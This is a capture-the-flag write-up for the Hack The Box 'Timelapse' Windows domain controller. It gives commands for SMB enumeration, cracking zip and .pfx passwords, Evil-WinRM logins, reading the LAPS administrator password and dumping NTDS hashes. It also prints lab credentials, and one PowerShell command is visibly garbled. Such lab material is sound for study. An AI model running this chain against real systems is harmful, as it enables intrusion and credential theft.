Page cover

Timelapse

https://app.hackthebox.com/machines/Timelapse

Nmap

sudo nmap 10.10.11.152 -Pn -p- -sS -sV

PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-07-02 14:42:07Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49696/tcp open  msrpc             Microsoft Windows RPC
58212/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Starting out we check anonymous logon with smbmap. Where we find that "Shares" share is read only access to us.

smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb'

Recursively searching the share with smbmap reveals to us that LAPS may be installed in the environment as well as the interesting file winrm_backup.zip.

smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb' -r

Download the file:

smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb' -R -A .zip

As the zip file is password protected we can utilize zip2john to hash the file and then crack it.

/usr/sbin/zip2john 10.10.11.152-Shares_Dev_winrm_backup.zip 

supplying john with you rockyou.txt word list we find the hash is cracked quickly.

sudo john --wordlist=/usr/share/wordlists/rockyou.txt winrmbackup.hash 

We are left with the file legaccy_dev_auth.pfx. A .pfx file is a certificate in PKCS#12 format.

Again, we need to hash the .pfx file and crack the password.

/usr/bin/pfx2john legacyy_dev_auth.pfx >> pfx.hash

With the .pfx file we can now look at how we can connect to the target system. It is possible to connect over WinRM by providing a public certificate and a valid private key both of which can be extracted from .pfx files.

I used the following link for guidance on how to extract this information:

URL: https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file

# Extract the private key
openssl pkcs12 -in [yourfile.pfx] -nocerts -out [drlive.key]

# Extract the certificate
openssl pkcs12 -in [yourfile.pfx] -clcerts -nokeys -out [drlive.crt]

# Decrypt the private key
openssl rsa -in [drlive.key] -out [drlive-decrypted.key]

Note: You may need to connect to a TCP OpenVPN configuration for the following to connect successfully.

 evil-winrm -i '10.10.11.152' -c 'drlive.crt' -k 'drlive-decrypted.key' -S -r 'timelapse.htb' 

From here we look into the ConsoleHost_History.txt file and find credential information contained within.

We now have the credentials for svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV

evil-winrm -i '10.10.11.152' -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S -P 5986

Viewing the group memberships for our current user we see we are a member of "LAPS Readers".

Knowing this we can run the following b command to pull the local administrator password for the host DC01.

Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Objee $null } | Select-Object 'Name','ms-Mcs-AdmPwd'

We are then able to use Evil-WinRM to authenticate against the target system with the LAPS password.

evil-winrm -i '10.10.11.152' -u 'administrator' -p '+K)HlT72oO(W6;W&402qD9LS' -S -P 5986

Then grab the root flag.

Crackmapexec has also been utilized with the credentials to dump the NTDS.dit hashes from the target system.

Last updated